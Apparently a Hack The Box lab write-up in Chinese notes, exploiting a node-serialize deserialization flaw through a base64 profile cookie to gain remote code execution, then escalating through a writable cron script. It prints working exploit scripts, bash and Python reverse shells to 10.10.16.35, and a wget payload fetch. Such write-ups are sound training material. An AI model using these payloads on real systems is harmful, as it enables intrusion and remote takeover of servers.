- URL : https://app.hackthebox.eu/machines/130
- IP : 10.129.217.35
Recon
- 掃 Port
nmapAutomator.sh -H 10.129.217.35 -t recon
- 掃路徑
- 首頁 404
- 發現有餅乾
- F5 後
- 發現餅乾是 Serialize
Serialize
import requests
import base64
src = b'{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'
dst = base64.b64encode(src).decode('ascii')
cookies = {
'profile': dst
}
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
'Cache-Control': 'max-age=0',
}
response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)
print(response.text)亂戳
{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": true}會回傳
Hey meow true + true is 2戳
{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": []}會回傳
Hey meow + is undefined戳
eval("A")會噴錯
錯誤中有提到
SyntaxError: Unexpected token e<br> at Object.parse (native)<br> at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js- Google
node-serialize exploit - https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf
透過 IIFE 來達成 RCE
var y = {
rce : function(){
require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));{"rce":"_$$ND_FUNC$$_function(){\n require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }"}var y = {
rce : function(){
require('child_process').exec('id', function(error, stdout, stderr) { console.log(stdout) });}(),
username: "meow" ,
country:"Idk Probably Somewhere Dumb",
city :"Lametown",
// num: 2,
}
var serialize = require('node-serialize');
// console.log("Serialized: \n" + Buffer.from(serialize.serialize(y)).toString('base64'));
var s = serialize.serialize(y);
// console.log(s)
serialize.unserialize(s)- 戳 Reverse shell
bash -c 'bash -i >& /dev/tcp/10.10.16.35/7877 0>&1'
Exploit
- 完整 Payload
src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('wget 10.10.16.35', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
import requests
import base64
cmd = "wget 10.10.16.35"
src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('""" + cmd + """', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
src = src.encode('ascii')
dst = base64.b64encode(src).decode('ascii')
cookies = {
'profile': dst
}
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
'Cache-Control': 'max-age=0',
}
response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)
print(response.text)- 就成功 RCE ㄌ
wget 10.10.16.35/s_HTB -O /tmp/s- 放 Reverse shell
- 戳回來
提權
python -c 'import pty; pty.spawn("/bin/bash")'- 發現家目錄有
output.txt - 跑豌豆
- 找到一個 Cronjob
- 觀察
output.txt - 尋找
Script is running 在哪grep -rnw '/' -e 'Script is running...' 2>/dev/null
- 找到 user flag
- script 是 cron job 每5分鐘跑一次,且我們可以修改
- 戳 reverse shell
echo "import os" > script.pyecho "os.system(\"bash -c 'bash -i >& /dev/tcp/10.10.16.35/7878 0>&1'\")" >> script.py
- 收 Reverse shell
